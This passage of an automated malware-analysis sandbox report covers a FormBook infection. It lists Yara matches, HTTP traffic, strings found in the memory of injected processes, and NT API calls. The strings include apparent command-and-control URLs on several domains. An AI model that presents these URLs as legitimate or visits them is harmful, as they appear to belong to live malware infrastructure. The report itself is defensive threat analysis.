            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 14:41:02 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 14:41:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925169217.0000000002CE1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lavillitadepapa.com
            Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925169217.0000000002CE1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lavillitadepapa.com/i1fz/
            Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: GJRX21GBj3.exeString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
            Source: GJRX21GBj3.exeString found in binary or memory: https://aka.ms/nativeaot-c
            Source: GJRX21GBj3.exe, 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
            Source: GJRX21GBj3.exeString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
            Source: GJRX21GBj3.exeString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
            Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
            Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
            Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
            Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
            Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2h
            Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfQ
            Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: findstr.exe, 00000007.00000003.2520276379.0000000008026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
            Source: findstr.exe, 00000007.00000002.3926054651.00000000041F6000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000003876000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2627811818.0000000028C66000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://valerieomage.com/c7rq?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl
            Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: findstr.exe, 00000007.00000002.3926054651.000000000451A000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000003B9A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.kosherphonestore.com/ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkji
            Source: findstr.exe, 00000007.00000002.3926054651.0000000004B62000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.00000000041E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.siteblogoficialon.com/xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0042B593 NtClose,4_2_0042B593
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C35C0 NtCreateMutant,LdrInitializeThunk,4_2_058C35C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_058C2DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_058C2C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2B60 NtClose,LdrInitializeThunk,4_2_058C2B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C4650 NtSuspendThread,4_2_058C4650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C3090 NtSetValueKey,4_2_058C3090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C3010 NtOpenDirectoryObject,4_2_058C3010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C4340 NtSetContextThread,4_2_058C4340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2DB0 NtEnumerateKey,4_2_058C2DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2DD0 NtDelayExecution,4_2_058C2DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2D00 NtSetInformationFile,4_2_058C2D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C3D10 NtOpenProcessToken,4_2_058C3D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2D10 NtMapViewOfSection,4_2_058C2D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2D30 NtUnmapViewOfSection,4_2_058C2D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C3D70 NtOpenThread,4_2_058C3D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2CA0 NtQueryInformationToken,4_2_058C2CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2CC0 NtQueryVirtualMemory,4_2_058C2CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2CF0 NtOpenProcess,4_2_058C2CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2C00 NtQueryInformationProcess,4_2_058C2C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2C60 NtCreateKey,4_2_058C2C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2F90 NtProtectVirtualMemory,4_2_058C2F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2FA0 NtQuerySection,4_2_058C2FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2FB0 NtResumeThread,4_2_058C2FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2FE0 NtCreateFile,4_2_058C2FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2F30 NtCreateSection,4_2_058C2F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2F60 NtCreateProcessEx,4_2_058C2F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2E80 NtReadVirtualMemory,4_2_058C2E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2EA0 NtAdjustPrivilegesToken,4_2_058C2EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2EE0 NtQueueApcThread,4_2_058C2EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2E30 NtWriteVirtualMemory,4_2_058C2E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C39B0 NtGetContextThread,4_2_058C39B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2B80 NtQueryInformationFile,4_2_058C2B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2BA0 NtEnumerateValueKey,4_2_058C2BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2BE0 NtQueryValueKey,4_2_058C2BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2BF0 NtAllocateVirtualMemory,4_2_058C2BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2AB0 NtWaitForSingleObject,4_2_058C2AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2AD0 NtReadFile,4_2_058C2AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C2AF0 NtWriteFile,4_2_058C2AF0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C4340 NtSetContextThread,LdrInitializeThunk,7_2_036C4340
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C4650 NtSuspendThread,LdrInitializeThunk,7_2_036C4650
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C35C0 NtCreateMutant,LdrInitializeThunk,7_2_036C35C0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2B60 NtClose,LdrInitializeThunk,7_2_036C2B60
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2AF0 NtWriteFile,LdrInitializeThunk,7_2_036C2AF0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2AD0 NtReadFile,LdrInitializeThunk,7_2_036C2AD0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C39B0 NtGetContextThread,LdrInitializeThunk,7_2_036C39B0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2F30 NtCreateSection,LdrInitializeThunk,7_2_036C2F30
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2FE0 NtCreateFile,LdrInitializeThunk,7_2_036C2FE0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2FB0 NtResumeThread,LdrInitializeThunk,7_2_036C2FB0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_036C2EE0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_036C2D30
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_036C2D10
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_036C2DF0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2DD0 NtDelayExecution,LdrInitializeThunk,7_2_036C2DD0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2C60 NtCreateKey,LdrInitializeThunk,7_2_036C2C60
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_036C2C70
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_036C2CA0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C3010 NtOpenDirectoryObject,7_2_036C3010
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C3090 NtSetValueKey,7_2_036C3090
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2BE0 NtQueryValueKey,7_2_036C2BE0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2BF0 NtAllocateVirtualMemory,7_2_036C2BF0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2BA0 NtEnumerateValueKey,7_2_036C2BA0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2B80 NtQueryInformationFile,7_2_036C2B80
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2AB0 NtWaitForSingleObject,7_2_036C2AB0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2F60 NtCreateProcessEx,7_2_036C2F60
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2FA0 NtQuerySection,7_2_036C2FA0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2F90 NtProtectVirtualMemory,7_2_036C2F90
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2E30 NtWriteVirtualMemory,7_2_036C2E30
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2EA0 NtAdjustPrivilegesToken,7_2_036C2EA0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2E80 NtReadVirtualMemory,7_2_036C2E80
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C3D70 NtOpenThread,7_2_036C3D70
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2D00 NtSetInformationFile,7_2_036C2D00
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C3D10 NtOpenProcessToken,7_2_036C3D10
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2DB0 NtEnumerateKey,7_2_036C2DB0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2C00 NtQueryInformationProcess,7_2_036C2C00
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2CF0 NtOpenProcess,7_2_036C2CF0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C2CC0 NtQueryVirtualMemory,7_2_036C2CC0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E68090 NtClose,7_2_02E68090
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E68000 NtDeleteFile,7_2_02E68000
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E67F20 NtReadFile,7_2_02E67F20
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E67DC0 NtCreateFile,7_2_02E67DC0
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF6585834800_2_00007FF658583480
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF658581D800_2_00007FF658581D80
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF65856D1F00_2_00007FF65856D1F0
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF658556AA00_2_00007FF658556AA0
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF658563AC00_2_00007FF658563AC0
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF65855B2C00_2_00007FF65855B2C0
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF65857C3A00_2_00007FF65857C3A0
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF6585863B00_2_00007FF6585863B0
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF6585713840_2_00007FF658571384
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF65855BB600_2_00007FF65855BB60
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF65858E4B00_2_00007FF65858E4B0
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF6585854900_2_00007FF658585490
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF65857BC700_2_00007FF65857BC70
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF658561C500_2_00007FF658561C50
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF658562D000_2_00007FF658562D00
